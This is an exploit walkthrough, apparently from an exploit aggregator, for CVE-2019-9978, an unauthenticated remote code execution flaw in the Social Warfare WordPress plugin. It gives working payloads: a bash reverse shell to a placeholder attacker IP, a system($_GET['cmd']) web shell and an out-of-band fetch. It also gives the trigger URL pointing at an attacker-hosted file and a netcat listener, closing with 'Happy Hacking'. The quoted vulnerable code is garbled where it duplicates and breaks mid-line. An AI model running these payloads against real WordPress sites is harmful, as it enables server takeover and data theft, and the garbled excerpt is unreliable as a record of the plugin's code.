## https://sploitus.com/exploit?id=484BAB43-933C-56E3-A0BB-F112DD3985AD

# ๐ CVE-2019-9978 โ Social Warfare WordPress Plugin RCE
> **โ ๏ธ DISCLAIMER:** This repository is for **educational and authorized security testing only**. Use only on systems you own or have explicit written permission to test. Unauthorized access is illegal.
------
## ๐ Overview
| Property | Value |
| --------------------------- | --------------------------------------------------------- |
| **CVE ID** | CVE-2019-9978 |
| **Affected Software** | Social Warfare Plugin โค 3.5.2 (WordPress) |
| **Vulnerability Type** | Remote Code Execution (RCE) / Remote File Inclusion (RFI) |
| **Authentication Required** | โ **No** โ unauthenticated |
| **CVSS Score** | 9.8 (Critical) |
| **Fixed In** | Version 3.5.3 |
| **Exploited In The Wild** | Yes โ March 2019 |
The Social Warfare plugin is a popular WordPress plugin that adds social sharing buttons to websites. Versions **3.5.0 through 3.5.2** contain a critical RCE vulnerability that allows attackers to execute arbitrary PHP code on the server without any authentication .
------
### what's this plugin usage ?
**Social Warfare** is a popular WordPress plugin that adds **social sharing buttons** to websites, allowing visitors to easily share content on platforms like:
- Facebook
- Twitter / X
- Pinterest
- LinkedIn
- Reddit
- WhatsApp

---
## Root Cause Analysis
### The Vulnerable Code
```php
if ( true == SWP_Utility::debug( 'load_options' ) ) {
// โ ๏ธ CRITICAL MISUNDERSTANDING:
// is_admin() only checks if the page is in /wp-admin/
// It does NOT verify authentication or user privileges!
if ( is_admin() ) {
wp_die( 'You do not have authorization to view this page.' );
}
// Step 1: Fetch remote file from user-controlled URL
// No validation, no sanitization, no whitelist!
$options = file_get_contents( $_GET['swp_url'] . '?swp_debug=get_user_options' );
// Step 2: Extract content between tags
if ( strpos( $options, '' ) !== false ) {
$options = str_replace( '', '', $options );
$cutoff = strpos( $options, '' );
$options = substr( $options, 0, $cutoff );
}
// Step 3: Build PHP code string
$array = 'return ' . $options . ';';
// Step 4: ๐ CRITICAL FLAW - User-supplied code is executed!
try {
$fetched_options = eval( $array ); // ' ) !== false ) {
$options = str_replace( '', '', $options );
$cutoff = strpos( $options, '' );
$options = substr( $options, 0, $cutoff );
}
$array = 'return ' . $options . ';';
try {
$fetched_options = eval( $array ); // ` tags.
------
## ๐ Exploitation Walkthrough
### Step 1: Identify Vulnerable Target or install a WordPress and this plugin then follow the steps
Use WPScan to identify the Social Warfare plugin version :
```bash
wpscan --url http://target.com --enumerate vp
```
- **Social Warfare** plugin version **โค 3.5.2**
if you installed by yourself dont forget to Activate the plugin form admin panel.
------
### Step 2: Create Payload File
Create `payload.txt` with your desired payload and then make a server to serve that payload.
example payloads :
**Test Payload (Verify RCE):**
```php
phpinfo();
```
**out of bound test:**
```
@file_get_contents('http://burp collabrator');
```
**Linux Reverse Shell:**
```bash
system("bash -c \"bash -i >& /dev/tcp/YOUR_IP/4444 0>&1\"");
```
**Interactive Command Executor:**
```php
system($_GET['cmd']);
```
------
### Step 3: Host the Payload
Start a Python HTTP server to host your payload:
```bash
python3 -m http.server 8000
```
Your payload is now accessible at: `http://YOUR_IP:8000/payload.txt`
if you use localhost:
```
http://127.0.0.1:8000/payload.txt
```
after making the request from the vulnerable code you should see a 200 status code :

------
### Step 4: Trigger the Exploit
**Option A โ Manual Trigger:**
Visit this URL in your browser or use `curl`:
```
http://wordpress ip or domain/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_IP:8000/payload.txt
```
again if you use localhost:
```
http://wordpress ip or domain/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://127.0.0.1:8000/payload.txt
```
------
### Step 5: Catch the Reverse Shell (For Reverse Shell Payloads)
```bash
nc -lvnp 4444
```
If successful, you'll get a shell!
------
## results:
```
@file_get_contents('http://burp collabrator');
```

```
phpinfo();
```

------
**Happy Hacking! ๐**